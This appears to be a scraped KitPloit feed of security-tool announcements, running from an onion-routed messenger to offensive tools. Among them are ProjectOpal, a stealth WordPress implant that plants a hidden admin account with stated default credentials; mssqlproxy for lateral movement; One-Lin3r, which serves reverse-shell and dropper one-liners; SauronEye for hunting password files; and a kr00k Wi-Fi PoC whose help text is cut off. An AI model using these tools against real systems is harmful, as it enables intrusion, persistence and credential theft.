Channel: KitPloit - PenTest Tools!

Tinfoil Chat - Onion-routed, Endpoint Secure Messaging System


Tinfoil Chat (TFC) is a FOSS+FHD peer-to-peer messaging system that relies on a high-assurance hardware architecture to protect users from passive collection, MITM attacks and, most importantly, remote key exfiltration. TFC is designed for people with one of the most complex threat models: organized crime groups and nation-state hackers who bypass the end-to-end encryption of traditional secure messaging apps by hacking the endpoint.

State-of-the-art cryptography
TFC uses XChaCha20-Poly1305 end-to-end encryption with deniable authentication to protect all messages and files sent to individual recipients and groups. The symmetric keys are either pre-shared or exchanged using X448, the base-10 fingerprints of which are verified via an out-of-band channel. TFC provides per-message forward secrecy with a BLAKE2b-based hash ratchet. All persistent user data is encrypted locally using XChaCha20-Poly1305, the key of which is derived from a password and salt using Argon2id, whose parameters are automatically tuned according to best practices. Key generation in TFC relies on the Linux kernel's getrandom(), a syscall for its ChaCha20-based CSPRNG.
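As an illustration of the hash-ratchet idea behind the per-message forward secrecy described above, the sketch below derives a fresh one-time key per message from a chain key using BLAKE2b. The domain-separation labels and the stand-in root key are illustrative assumptions, not TFC's actual key derivation:

```python
import hashlib

def blake2b32(*parts: bytes) -> bytes:
    """32-byte BLAKE2b digest over the concatenated inputs."""
    h = hashlib.blake2b(digest_size=32)
    for p in parts:
        h.update(p)
    return h.digest()

def ratchet(chain_key: bytes):
    """Derive a one-time message key and the next chain key.
    The labels here are illustrative, not TFC's actual constants."""
    message_key = blake2b32(chain_key, b"message_key")
    next_chain_key = blake2b32(chain_key, b"next_chain_key")
    return message_key, next_chain_key

ck = blake2b32(b"shared secret from X448 or PSK")  # stand-in root key
k1, ck = ratchet(ck)
k2, ck = ratchet(ck)
assert k1 != k2  # every message is protected with a fresh key
```

Because the hash function is one-way, compromising the current chain key does not reveal the keys of already-delivered messages, which is the forward-secrecy property claimed above.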

Anonymous by design
TFC routes all communication exclusively through the Tor anonymity network. It uses the next generation (v3) Tor Onion Services to enable P2P communication that never exits the Tor network. This makes it hard for the users to accidentally deanonymize themselves. It also means that unlike (de)centralized messengers, there's no third party server with access to user metadata such as who is talking to whom, when, and how much. The network architecture means TFC runs exclusively on the user's devices. There are no ads or tracking, and it collects no data whatsoever about the user. All data is always encrypted with keys the user controls, and the databases never leave the user's device.
Using Onion Services also means no account registration is needed. During the first launch TFC generates a random TFC account (an Onion Service address) for the user, e.g. 4sci35xrhp2d45gbm3qpta7ogfedonuw2mucmc36jxemucd7fmgzj3ad. By knowing this TFC account, anyone can send the user a contact request and talk to them without ever learning their real life identity, IP-address, or geolocation. Protected geolocation makes physical attacks very difficult because the attacker doesn't know where the device is located on the planet. At the same time it makes the communication censorship resistant: Blocking TFC requires blocking Tor categorically, nation-wide.
TFC also features a traffic masking mode that hides the type, quantity, and schedule of communication, even if the network-facing device of the user is hacked. To provide even further metadata protection from hackers, the Internet-facing part of TFC can be run on Tails, a privacy and anonymity focused operating system that contains no personal files of the user (which makes it hard to deduce to whom the endpoint belongs), and that provides additional layers of protection for their anonymity.

First messaging system with endpoint security
TFC is designed to be used in a hardware configuration that provides strong endpoint security. This configuration uses three computers per endpoint: the encryption and decryption processes are separated from each other onto two isolated computers, the Source Computer and the Destination Computer. These two devices are dedicated to TFC. This split TCB interacts with the network via the user's daily computer, called the Networked Computer.
In TFC, data moves unidirectionally from the Source Computer to the Networked Computer, and from the Networked Computer to the Destination Computer. The unidirectionality of the data flow is enforced by passing the data from one device to another only through a free-hardware-design data diode, which is connected to the three computers using one USB cable per device. The Source and Destination Computers are not connected to the Internet, or to any device other than the data diode.


TFC data diode

The optical repeaters inside the optocouplers of the data diode enforce the direction of data transmission with the fundamental laws of physics. This protection is so strong that certified implementations of data diodes are typically found in critical infrastructure protection and government networks where the classification level of data varies between systems. A data diode might, for example, allow access to a nuclear power plant's safety system readings while at the same time preventing attackers from exploiting these critical systems. An alternative use case is to allow importing data from less secure systems into ones that contain classified documents that must be protected from exfiltration.
In TFC the hardware data diode ensures that neither of the TCB halves can be accessed bidirectionally. Since the protection relies on the physical limitations of the hardware's capabilities, no piece of malware, not even a zero-day exploit, can bypass the security provided by the data diode.

How it works
With the hardware in place, all that's left for the users to do is launch the device-specific TFC program on each computer.


System overview

In the illustration above, Alice enters messages and commands to Transmitter Program running on her Source Computer. The Transmitter Program encrypts and signs plaintext data and relays the ciphertexts from Source Computer to her Networked Computer through the data diode.
Relay Program on Alice's Networked Computer relays commands and copies of outgoing messages to her Destination Computer via the data diode. Receiver Program on Alice's Destination Computer authenticates, decrypts and processes the received message/command.
Alice's Relay Program shares messages and files to Bob over a Tor Onion Service. The web client of Bob's Relay Program fetches the ciphertext from Alice's Onion Service and forwards it to his Destination Computer through his data diode. Bob's Receiver Program then authenticates, decrypts and processes the received message/file.
When Bob responds, he will type his message to the Transmitter Program on his Source Computer, and after a mirrored process, Alice reads the message from the Receiver Program on her Destination Computer.
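The message path described above can be modeled in miniature. The toy sketch below stands in for the Transmitter, Relay, and Receiver Programs with strictly one-way queues and a keyed BLAKE2b tag; it is a conceptual model only, not TFC's actual protocol (which encrypts as well as authenticates), and the key is a placeholder:

```python
import hashlib
import hmac
import queue

KEY = b"\x01" * 32  # stand-in for a pre-shared symmetric key

def mac(key: bytes, data: bytes) -> bytes:
    """Keyed BLAKE2b tag, standing in for real authenticated encryption."""
    return hashlib.blake2b(data, key=key, digest_size=32).digest()

# Each Queue models one arm of the data diode: data flows one way only.
source_to_net = queue.Queue()  # Source Computer   -> Networked Computer
net_to_dest = queue.Queue()    # Networked Computer -> Destination Computer

# Transmitter Program (Source Computer): authenticate outgoing data.
msg = b"hello Bob"
source_to_net.put(msg + mac(KEY, msg))

# Relay Program (Networked Computer): forwards blindly; it holds no keys,
# so compromising it yields only opaque, authenticated blobs.
net_to_dest.put(source_to_net.get())

# Receiver Program (Destination Computer): verify before processing.
blob = net_to_dest.get()
data, tag = blob[:-32], blob[-32:]
assert hmac.compare_digest(tag, mac(KEY, data))
```

The key point the model captures is that the Relay Program never needs key material: it only moves authenticated blobs in one direction.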

Why keys and plaintexts cannot be exfiltrated
The architecture described above simultaneously utilizes both the classical and the alternative data diode models to enable bidirectional communication between two users, while at the same time providing hardware enforced endpoint security:
  1. The Destination Computer uses the classical data diode model. This means it can receive data from the insecure Networked Computer, but is unable to send data back to the Networked Computer. The Receiver Program is designed to function under these constraints. Even though the program authenticates and validates all incoming data, it cannot be ruled out that malware could still infiltrate the Destination Computer. However, if that were to happen, the malware would be unable to exfiltrate sensitive keys or plaintexts back to the Networked Computer, as the data diode prevents all outbound traffic.
  2. The Source Computer uses the alternative data diode model. This means it can output encrypted data to the insecure Networked Computer without having to worry about being compromised: the data diode protects the Source Computer from all attacks by physically preventing all inbound traffic. The Transmitter Program is also designed to work under the data flow constraints introduced by the data diode: to allow key exchanges, the short elliptic-curve public keys are input manually by the user.
  3. The Networked Computer is designed under the assumption it can be compromised by a remote attacker: All sensitive data that passes through the Relay Program is encrypted and signed with no exceptions. Since the attacker is unable to exfiltrate decryption keys from the Source or Destination Computer, the ciphertexts are of no value to the attacker.
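Since ciphertexts pass through an untrusted Networked Computer, the out-of-band fingerprint check mentioned earlier is what rules out a MITM during the key exchange. The sketch below renders a public key as a base-10 fingerprint for reading aloud; the encoding (a BLAKE2b digest as grouped decimal digits) is an illustrative assumption, not TFC's exact format:

```python
import hashlib

def b10_fingerprint(pub_key: bytes) -> str:
    """Render a public key as a base-10 fingerprint for out-of-band
    comparison. The grouping and digit count here are illustrative."""
    digest = hashlib.blake2b(pub_key, digest_size=32).digest()
    # A 256-bit value has at most 78 decimal digits; keep 60 of them.
    digits = str(int.from_bytes(digest, "big")).zfill(78)[:60]
    return " ".join(digits[i:i + 5] for i in range(0, 60, 5))

# Both parties compute this locally and compare over a voice call:
fp = b10_fingerprint(b"\x01" * 56)  # X448 public keys are 56 bytes
```

If the spoken fingerprints match on both ends, the attacker on the Networked Computer cannot have substituted their own public key.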

Exfiltration security

Qubes-isolated intermediate solution
For some users the APTs of the modern world are not part of the threat model, and for others, the requirement of having to build the data diode by themselves is a deal breaker. Yet, for all of them, storing private keys on a networked device is still a security risk.
To meet these users' needs, TFC can also be run in three dedicated Qubes virtual machines. With the Qubes configuration, the isolation is provided by the Xen hypervisor, and the unidirectionality of data flow between the VMs is enforced with strict firewall rules. This intermediate isolation mechanism runs on a single computer which means no hardware data diode is needed.
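As a hedged sketch of what "strict firewall rules" between the VMs can look like, the rules below allow each link in only one direction. The VM addresses and the iptables tooling are assumptions for illustration, not TFC's actual Qubes configuration:

```
# Illustrative only - hypothetical VM addresses, not TFC's actual rules.
# Allow Source VM -> Networked VM, drop the reverse direction:
iptables -A FORWARD -s 10.137.0.10 -d 10.137.0.20 -j ACCEPT
iptables -A FORWARD -s 10.137.0.20 -d 10.137.0.10 -j DROP
# Allow Networked VM -> Destination VM, drop the reverse direction:
iptables -A FORWARD -s 10.137.0.20 -d 10.137.0.30 -j ACCEPT
iptables -A FORWARD -s 10.137.0.30 -d 10.137.0.20 -j DROP
```

Unlike the hardware diode, this enforcement depends on the hypervisor and firewall VM remaining uncompromised, which is why the article calls it an intermediate solution.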

Supported Operating Systems

Source/Destination Computer
  • Debian 10
  • PureOS 9.0
  • *buntu 19.10
  • LMDE 4
  • Qubes 4 (Debian 10 VM)

Networked Computer
  • Tails 4.0
  • Debian 10
  • PureOS 9.0
  • *buntu 19.10
  • LMDE 4
  • Qubes 4 (Debian 10 VM)

More information
Threat model
FAQ
Security design
Hardware Data Diode
    Breadboard version (Easy)
    Perfboard version (Intermediate)
    PCB version (Advanced)
How to use
    Installation
    Master password setup
    Local key setup
    Onion Service setup
    X448 key exchange
    Pre-shared keys
    Commands
Update log



ProjectOpal - Stealth Post-Exploitation Framework For Wordpress


Stealth post-exploitation framework for Wordpress CMS
Official ProjectOpal Repository.

What is it and why was it made?
We originally made it for our penetration testing jobs, but it's getting grey hairs now, so we thought we would pass it on to the public! ProjectOpal, or Opal, is a stealth post-exploitation framework for WordPress sites that can hide its traces from logs and obfuscate its way through the system. :)
One of its fun features is that it creates an admin user hidden from all users, including admins. Just note that the user is stored in the database, so don't forget to delete your traces.

WORDPRESS:
Login: opal@wordpress.com
(Default) Pass: QCa9KT4eAvxzC5Kk or projectopal
Backend Login:
(Default) Login: QCa9KT4eAvxzC5Kk
  • LOGINTAMP: allows you to log in as any user
  • CHAPPY: creates an administrator account
  • USERDUMP: dumps all user entries
  • LOCATE: gets the implant location
If you need any help feel free to contact us at sales@shadowlabs.cc.
Enjoy!

Getting Started
Clone the repository with git:
git clone https://github.com/shadowlabscc/ProjectOpal.git && cd ProjectOpal
python opal.py
or
python Injector.py (Edit the config.py!)
You will see a start-up screen. Type help and get to know your shell better :)

Features:
These are features that the Shadowlabs Team prides itself on:
  • Bypass WAF(Web application firewall)
  • Hidden/Stealth
  • Lets you log in as any user
  • Dump entire user entries
  • Create a persistent admin account that is hidden
  • Obfuscated implant
  • Multi-functionality
├── Injector
│   ├── Dolly2.zip
│   ├── Injector.py
│   └── config.py
├── Wordpress
│   ├── 64fc9f8191afee3231e7197a27b8ee0c.php
│   ├── index.php
│   └── install.php
├── lib
│   ├── banner.txt
│   ├── config.password
│   ├── config.target
│   └── persistent_head.txt
└── opal.py


Mssqlproxy - A Toolkit Aimed To Perform Lateral Movement In Restricted Environments Through A Compromised Microsoft SQL Server Via Socket Reuse





mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse. The client requires impacket and sysadmin privileges on the SQL server.

Please read this article carefully before continuing.
It consists of three parts:
  • CLR assembly: Compile assembly.cs
  • Core DLL: Compile reciclador.sln
  • Client: mssqlclient.py (based on Impacket's example)
You can compile the libraries or download them from releases (x64).

Compilation
To generate the core DLL, just import the project to Visual Studio (reciclador.sln) and compile it.
To generate the CLR assembly, first you need to find the C# compiler:
Get-ChildItem -Recurse "C:\Windows\Microsoft.NET\" -Filter "csc.exe" | Sort-Object fullname -Descending | Select-Object fullname -First 1 -ExpandProperty fullname
Then,
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library .\assembly.cs

Usage
Once the two libraries are compiled, upload the core DLL (reciclador) to the target server.
Authentication options are the same as the ones in the original mssqlclient. mssqlproxy options:
proxy mode:
-reciclador path Remote path where DLL is stored in server
-install Installs CLR assembly
-uninstall Uninstalls CLR assembly
-check Checks if CLR is ready
-start Starts proxy
-local-port port Local port to listen on
-clr local_path Local CLR path
-no-check-src-port Use this option when connection is not direct (e.g. proxy)
We have also implemented two commands (within the SQL shell) for downloading and uploading files. Relating to the proxy stuff, we have four commands:
  • install: Creates the CLR assembly and links it to a stored procedure. You need to provide the -clr param to read the generated CLR from a local DLL file.
  • uninstall: Removes what install created.
  • check: Checks if everything is ready to start the proxy. Requires to provide the server DLL location (-reciclador), which can be uploaded using the upload command.
  • start: Starts the proxy. If -local-port is not specified, it will listen on port 1337/tcp.
Once the proxy is started, you can plug in your proxychains ;)
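A minimal proxychains configuration pointing at the local listener might look like the fragment below; the SOCKS version is an assumption to adjust for your setup, while 1337/tcp is the documented default port:

```
# excerpt from /etc/proxychains.conf
[ProxyList]
socks5 127.0.0.1 1337
```

With that in place, tools prefixed with proxychains will have their traffic tunneled through the compromised SQL Server.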
Note #1: if using a non-direct connection (e.g. proxies in between), the -no-check-src-port flag is needed, so the server only checks the source address.
Note #2: at the moment, only IPv4 targets are supported (neither DNS names nor IPv6 addresses).
Note #3: use carefully! For now, the MSSQL service will crash if you try to establish multiple concurrent connections.
Important: stop mssqlproxy by pressing Ctrl+C on the client. If you don't, the server may crash and you will have to restart the MSSQL service manually.

Authors
Pablo Martinez (@xassiz), Juan Manuel Fernandez (@TheXC3LL)

References

License
All the code included in this project is licensed under the terms of the MIT license. The mssqlclient.py is based on Impacket.




InQL Scanner - A Burp Extension For GraphQL Security Testing


A security testing tool to facilitate GraphQL technology security auditing efforts.

InQL can be used as a stand-alone script, or as a Burp Suite extension.

InQL Stand-Alone
Running inql from Python will issue an Introspection query to the target GraphQL endpoint in order to fetch metadata information for:
  • Queries, mutations, subscriptions
  • Their fields and arguments
  • Objects and custom object types
InQL can inspect the introspection query results and generate clean documentation in different formats, such as HTML and JSON schema. InQL is also able to generate templates (with optional placeholders) for all known basic data types.
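An introspection request of the kind such a tool sends is just a POST with a JSON body containing a GraphQL query. The sketch below builds a trimmed version of that payload (real clients request far more fields); the endpoint and transport details are left out:

```python
import json

# A trimmed introspection query; the full standard query also walks
# fields, arguments, interfaces, enum values, and directives.
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types { name kind }
  }
}
"""

# POST this body with Content-Type: application/json to the /graphql
# endpoint; the server's response describes its entire schema.
body = json.dumps({"query": INTROSPECTION_QUERY})
```

The documentation and templates InQL generates are derived from the schema returned by exactly this kind of query.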
The resulting HTML documentation page will contain details for all available Queries, Mutations, and Subscriptions as shown here:


The following screenshot shows the use of templates generation:


For all supported options, check the command line help:
usage: inql [-h] [-t TARGET] [-f SCHEMA_JSON_FILE] [-k KEY] [-p PROXY]
[--header HEADERS HEADERS] [-d] [--generate-html]
[--generate-schema] [--generate-queries] [--insecure]
[-o OUTPUT_DIRECTORY]

InQL Scanner

optional arguments:
-h, --help show this help message and exit
-t TARGET Remote GraphQL Endpoint (https://<Target_IP>/graphql)
-f SCHEMA_JSON_FILE Schema file in JSON format
-k KEY API Authentication Key
-p PROXY IP of web proxy to go through (http://127.0.0.1:8080)
--header HEADERS HEADERS
-d Replace known GraphQL arguments types with placeholder
values (useful for Burp Suite)
--generate-html Generate HTML Documentation
--generate-schema Generate JSON Schema Documentation
--generate-queries Generate Queries
--insecure Accept any SSL/TLS certificate
-o OUTPUT_DIRECTORY Output Directory

InQL Burp Suite Extension
Since version 1.0 of the tool, InQL has been extended to operate within Burp Suite. In this mode, the tool retains all the capabilities of the stand-alone script, plus a handy user interface to manipulate queries.
Using the inql extension for Burp Suite, you can:
  • Search for known GraphQL URL paths; the tool will grep and match known values to detect GraphQL endpoints within the target website
  • Search for exposed GraphQL development consoles (GraphiQL, GraphQL Playground, and other common consoles)
  • Use a custom GraphQL tab displayed on each HTTP request/response containing GraphQL
  • Leverage the templates generation by sending those requests to Burp's Repeater tool
  • Configure the tool by using a custom settings tab


To use inql in Burp Suite, import the Python extension:
  • Download the Jython Jar
  • Start Burp Suite
  • Extender Tab > Options > Python Environment > Set the location of the Jython standalone JAR
  • Extender Tab > Extension > Add > Extension Type > Select Python
  • Download the latest inql_burp.py release here
  • Extension File > Set the location of inql_burp.py > Next
  • The output should now show the following message: InQL Scanner Started!
In the future, we might consider integrating the extension into Burp's BApp Store.

Burp Extension Usage
Getting started with the inql Burp extension is easy:
  1. Load a GraphQL endpoint or a JSON schema file location inside the top input field
  2. Press the "Load" button
  3. After a few seconds, the left panel will refresh, loading the directory structure for the selected endpoint, as in the following example:
  • url
    • query
      • timestamp 1
        • query1.query
        • query2.query
      • timestamp 2
        • query1.query
        • query2.query
    • mutation
    • subscription
  4. Selecting any query/mutation/subscription will load the corresponding template in the main text area

Credits
Author and Maintainer: Andrea Brancaleoni (@nJoyneer - thypon)
Original Author: Paolo Stagno (@Void_Sec - voidsec.com)
This project was made with love in Doyensec Research island.


Webkiller v2.0 - Tool Information Gathering


An information gathering tool written in Python.

PreView


[ASCII-art banner: WEBKILLER]
====================================================================
** WebSite : UltraSec.org **
** Channel : @UltraSecurity **
** Developers : Ultra Security Team **
** Team Members : Ashkan Moghaddas , Behzad Khalifeh , AmirMohammad Safari **
** Thank's : .::Shayan::. **
====================================================================

[卐] Choose one of the options below

[1] Information Gathering

[2] CMS Detection

[3] Developer :)

[4] Exit . . .

┌─[WEBKILLER~@HOME]
└──╼ 卐

Operating Systems Tested
  • Kali Linux 2020.1
  • Windows 10
  • Ubuntu 19.10

Install
git clone https://github.com/ultrasecurity/webkiller.git
cd webkiller
pip3 install -r requirements.txt
python3 webkiller.py

Video Tutorial


Thanks to
Ashkan Moghaddas - Ultra Security Team Leader
Behzad Khalifeh - Ultra Security Team Programmer
AmirMohammad Safari - WebApplication Pentester

Contact us


SauronEye - Search Tool To Find Specific Files Containing Specific Words, I.E. Files Containing Passwords


SauronEye is a search tool built to aid red teams in finding files containing specific keywords.

Features:
  • Search multiple (network) drives
  • Search contents of files
  • Search contents of Microsoft Office files (.doc, .docx, .xls, .xlsx)
  • Find VBA macros in old 2003 .xls and .doc files
  • Search multiple drives multi-threaded for increased performance
  • Supports regular expressions in search keywords
  • Compatible with Cobalt Strike's execute-assembly
It's also quite fast: it can search 50k files, totaling 1.3 TB, on a network drive in under a minute (with realistic file filters), and it searches a C:\ drive (on a cheap SATA SSD) in about 15 seconds.

Usage
SauronEye.exe --directories C:\ \\SOMENETWORKDRIVE\C$ --filetypes .txt .bat .docx .conf --contents --keywords password pass*
         === SauronEye ===

Directories to search: C:\Users\vincent\Desktop\
For file types: .txt, .doc, .docx, .xls
Containing: wacht, pass
Search contents: True
Search Office 2003 files for VBA: True
Max file size: 1000 KB
Search Program Files directories: False
Searching in parallel: C:\Users\vincent\Desktop\
[+] C:\Users\vincent\Desktop\test\wachtwoord - Copy (2).txt
[+] C:\Users\vincent\Desktop\test\wachtwoord - Copy (3).txt
[+] C:\Users\vincent\Desktop\test\wachtwoord - Copy.txt
[+] C:\Users\vincent\Desktop\test\wachtwoord.txt
[+] C:\Users\vincent\Desktop\pass.txt
[*] Done searching file system, now searching contents
[+] C:\Users\vincent\Desktop\pass.txt
...the admin password=admin123...

[+] C:\Users\vincent\Desktop\test.docx:
...this is a testPassword = "welkom12...


Done. Time elapsed = 00:00:01.6656911
C:\>SauronEye.exe --help

=== SauronEye ===

Usage: SauronEye.exe [OPTIONS]+ argument
Search directories for files containing specific keywords.

Options:
-d, --directories=VALUE Directories to search
-f, --filetypes=VALUE Filetypes to search for/in
-k, --keywords=VALUE Keywords to search for
-c, --contents Search file contents
-m, --maxfilesize=VALUE Max file size to search contents in, in kilobytes
-b, --beforedate=VALUE Filter files last modified before this date,
format: yyyy-MM-dd
-a, --afterdate=VALUE Filter files last modified after this date,
format: yyyy-MM-dd
-s, --systemdirs Search in filesystem directories %APPDATA% and %WINDOWS%
-v, --vbamacrocheck Check if 2003 Office files (*.doc and *.xls)
contain a VBA macro
-h, --help Show help

Notes
SauronEye does not search %WINDIR% and %APPDATA%. Use the --systemdirs flag to search the contents of Program Files*. SauronEye relies on functionality only available from .NET 4.7.2, and so requires >= .NET 4.7.2 to run.


Project iKy v2.4.0 - Tool That Collects Information From An Email And Shows Results In A Nice Visual Interface


Project iKy is a tool that collects information from an email and shows results in a nice visual interface.

Visit the Gitlab Page of the Project

Installation

Clone repository

git clone https://gitlab.com/kennbroorg/iKy.git

Install Backend

Redis

You must install Redis
wget http://download.redis.io/redis-stable.tar.gz
tar xvzf redis-stable.tar.gz
cd redis-stable
make
sudo make install

Python stuff and Celery

You must install the libraries inside requirements.txt
python3 -m pip install -r requirements.txt

Install Frontend

Node

First of all, install nodejs.

Dependencies

Inside the frontend directory, install the dependencies:
cd frontend
npm install

Wake up iKy Tool

Turn on Backend

Redis

Turn on the server in a terminal
redis-server

Python stuff and Celery

Turn on Celery in another terminal, within the directory backend
./celery.sh
Again, in another terminal turn on backend app from directory backend
python3 app.py

Turn on Frontend

Finally, to run the frontend server, execute the following command from the frontend directory:
npm start

Screen after turning on iKy


Browser

Open the browser at this URL

Config API Keys

Once the application is loaded in the browser, you should go to the Api Keys option and load the values of the APIs that are needed.
  • Fullcontact: Generate the APIs from here
  • Twitter: Generate the APIs from here
  • Linkedin: Only the user and password of your account must be loaded
  • HaveIBeenPwned : Generate the APIs from here (Paid)
  • Emailrep.io : Generate the APIs from here

Wiki



Demo Videos


iKy eko15


iKy Version 2


Testing iKy with Emiliano


Testing iKy with Giba


iKy version 1

iKy version 0

Disclaimer

Anyone who contributes or contributed to the project, including me, is not responsible for the use of the tool (Neither the legal use nor the illegal use, nor the "other" use).
Keep in mind that this software was initially written for a joke, then for educational purposes (to educate ourselves), and now the goal is to collaborate with the community making quality free software, and while the quality is not excellent (sometimes not even good) we strive to pursue excellence.
Consider that all the information collected is free and available online; the tool only tries to discover, collect, and display it. Many times the tool cannot even achieve its goal of discovery and collection. Please load the necessary APIs before remembering my mother. If even with the APIs it doesn't show the "nice" things you expect to see, try other e-mails before you remember my mother. If you still do not see the "nice" things you expect to see, you can create an issue, or contact us by e-mail or by any of the RRSS, but keep in mind that my mother is neither the creator of nor a contributor to the project.
We do not refund your money if you are not satisfied. I hope you enjoy using the tool as much as we enjoy doing it. The effort was and is enormous (Time, knowledge, coding, tests, reviews, etc.) but we would do it again. Do not use the tool if you cannot read the instructions and / or this disclaimer clearly.
By the way, for those who insist on remembering my mother, she died many years ago but I love her as if she were right here.


One-Lin3r v2.1 - Gives You One-Liners That Aids In Penetration Testing Operations, Privilege Escalation And More


One-Lin3r is a simple, modular, and lightweight framework that gives you all the one-liners you will need while penetration testing (Windows, Linux, macOS or even BSD systems) or hacking generally, with a lot of new features to make all of this fully automated (e.g. you won't even need to copy the one-liners).

Screenshots




It consists of various one-liners types with various functions, some of them are:
One-liner function    What this function refers to
Reverse Shell         Various methods and commands to give you a reverse shell.
PrivEsc               Many commands to help in enumeration and privilege escalation.
Bind Shell            Various methods and commands to give you a bind shell.
Dropper               Many ways to download and execute various payload types with various methods.

Features
  • A lot of liners for different purposes; currently there are more than 155 liners.
  • The auto-complete feature that has been implemented in this framework is not the usual one you always see, here are some highlights:
    • It's designed to fix typos in typed commands to the most similar command with just one tab click, so seach becomes search and so on, even if you typed any random word similar to a command in this framework.
    • For you lazy-ones out there like me, it can predict what liner you are trying to use by typing any part of it. For example if you typed use capabilities and clicked tab, it would be replaced with use linux/bash/list_all_capabilities and so on. I can see your smile, You are welcome!
    • If you typed any wrong command then pressed enter, the framework will tell you what is the nearest command to what you have typed which could be the one you really wanted.
    • Some less impressive things like auto-complete for variables after set command, auto-complete for liners after use and info commands and finally it converts all uppercase to lowercase automatically just-in-case you switched cases by mistake while typing.
    • Finally, you'll find your normal auto-completion things you were using before, like commands auto-completion and persistent history, etc...
  • Automation
    • You can automatically copy the liner you want to clipboard with command copy <liner> instead of using use <liner> and then copying it which saves a lot of time, of course, if you merged it with the following features.
    • As you may have noticed, you can use a resource file from command-line arguments before starting the framework itself, or send commands directly.
    • Inside the framework you can use makerc command like in Metasploit but this time it only saves the correct important commands.
    • There are history and resource commands so you don't need to exit the framework.
    • You can execute as many commands as you want at the same time by splitting them with semi-colon.
    • Searching for any liner here is so easy and accurate, you can search for a liner by its name, function, description, author who added the liner to the framework or even the liner itself.
  • You can add your own liners by following these steps to create a liner as a python file. After that you can make a Pull request with it then it will be added in the framework and credited with your name of course .
  • The ability to reload the database if you added any liner without restarting the framework.
  • You can add any platform to the liners database just by making a folder in liners folder and creating a ".liner" file there.
  • More...
Note: The liners database is not too big but it will get bigger with updates and contributions.
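The nearest-command suggestion described in the features above can be approximated with the standard library's difflib; this is an illustrative sketch of the technique, not One-Lin3r's actual matcher, and the command list is a subset:

```python
import difflib

# A subset of the framework's commands, for illustration.
COMMANDS = ["search", "use", "copy", "info", "set", "help", "list",
            "variables", "banner", "reload", "history", "makerc"]

def nearest(cmd):
    """Return the closest known command for a typo, or None if nothing
    is similar enough."""
    matches = difflib.get_close_matches(cmd.lower(), COMMANDS,
                                        n=1, cutoff=0.6)
    return matches[0] if matches else None

print(nearest("seach"))  # -> search
```

The same similarity scoring also backs the "nearest command" hint printed after a mistyped command is entered.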

Usage

Command-line arguments
usage: one-lin3r [-h] [-r R] [-x X] [-q]

optional arguments:
-h, --help show this help message and exit
-r Execute a resource file (history file).
-x Execute a specific command (use ; for multiples).
-q Quiet mode (no banner).

Framework commands
Command                     Description
-------- -------------
help/? Show this help menu.
list/show List all one-liners in the database.
search (-h) [Keywords..] Search database for a specific liner by its name, author name or function.
use <liner> Use an available one-liner.
copy <liner> Use an available one-liner and copy it to clipboard automatically.
info <liner> Get information about an available liner.
set <variable> <value> Sets a context-specific variable to a value to use while using one-liners.
variables Prints all previously specified variables.
banner Display banner.
reload/refresh Reload the liners database.
check Prints the core version and checks if you are up-to-date.
history Display command-line most important history from the beginning.
makerc Save command-line history to a file.
resource <file> Run the commands stored in a file
os <command> Execute a system command without closing the framework
exit/quit Exit the framework

Prerequisites before installing
  • Python 3.x.
  • Any OS; it should work on all, but it's tested on Kali 2018+, Ubuntu 18+, Manjaro, Black Arch, Windows 10, Android Termux and macOS 10.11

Installing and running
  • Using pip (The best way to install on any OS):
pip install one-lin3r
one-lin3r -h
  • Using pacman on Black Arch or any arch-based with black Arch repos:
sudo pacman -S one-lin3r
  • Installing it from GitHub:
    • For windows on cmd with administrator rights : (After downloading ZIP and unzip it)
    python -m pip install ./One-Lin3r-master --user
    one-lin3r -h
    • For Linux Debian-based distros. (Ex: Kali, Ubuntu..):
    git clone https://github.com/D4Vinci/One-Lin3r.git
    sudo apt install libncurses5-dev
    sudo pip3 install ./One-Lin3r --user
    one-lin3r -h
    • For the rest Linux distros.:
    git clone https://github.com/D4Vinci/One-Lin3r.git
    sudo pip3 install ./One-Lin3r --user
    one-lin3r -h

Updating the framework or the database
  • If you installed it from pip do:
pip install one-lin3r --upgrade
  • If you installed it from GitHub do:
    • On Linux while outside the directory
    cd One-Lin3r && git pull && cd ..
    pip3 install ./One-Lin3r --upgrade
    • On Windows if you don't have git installed, re-download the framework zipped!
Note: The liners are written as Python modules, so they are considered part of the framework; whenever a new liner is added, the framework version is bumped.
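Since liners are plain Python modules, one could look roughly like the sketch below. This is purely illustrative: the class layout and attribute names are assumptions, not One-Lin3r's actual API, so check the project's wiki for the real template.

```python
# Hypothetical layout of a liner module; attribute names are assumptions,
# not One-Lin3r's real API -- see the project's wiki for the actual template.
class Liner:
    info = {
        "name": "linux/bash_reverse_tcp",   # made-up liner name
        "author": "you",
        "description": "Bash reverse shell one-liner",
    }
    # {ip} and {port} stand for variables set with the framework's `set` command.
    payload = "bash -i >& /dev/tcp/{ip}/{port} 0>&1"

    def run(self, variables):
        """Fill the payload template with user-supplied variables."""
        return self.payload.format(**variables)
```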

Disclaimer
One-Lin3r was created to help with penetration testing; the author is not responsible for any misuse or illegal use.
Copying code from this tool or using it in another tool is permitted as long as you mention where you got it from.
Pull requests are always welcomed :D


R00Kie-Kr00Kie - PoC Exploit For The CVE-2019-15126 Kr00K Vulnerability

Disclaimer
This is a PoC exploit for the CVE-2019-15126 kr00k vulnerability.
This project is intended for educational purposes only and cannot be used for law violation or personal gain.
The author of this project is not responsible for any possible harm caused by the materials.


Requirements
To use these scripts, you will need a Wi-Fi card supporting active monitor mode with frame injection. We recommend the Atheros AR9280 chip (IEEE 802.11n), which we used to develop and test the code. We have tested this PoC on Kali Linux.

Installation
# clone main repo
git clone https://github.com/hexway/r00kie-kr00kie.git && cd ./r00kie-kr00kie
# install dependencies
sudo pip3 install -r requirements.txt

How to use

Script: r00kie-kr00kie.py
This is the main exploit file that implements the kr00k attack.
->~:python3 r00kie-kr00kie.py -h

usage: r00kie-kr00kie.py [-h] [-i INTERFACE] [-l CHANNEL] [-b BSSID]
[-c CLIENT] [-n DEAUTH_NUMBER] [-d DEAUTH_DELAY]
[-p PCAP_PATH_READ] [-r PCAP_PATH_RESULT] [-q]

PoC of CVE-2019-15126 kr00k vulnerability

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --interface INTERFACE
Set wireless interface name for listen packets
-l CHANNEL, --channel CHANNEL
Set channel for wireless interface (default: 1)
-b BSSID, --bssid BSSID
Set WiFi AP BSSID (example: "01:23:45:67:89:0a")
-c CLIENT, --client CLIENT
Set WiFi client MAC address (example:
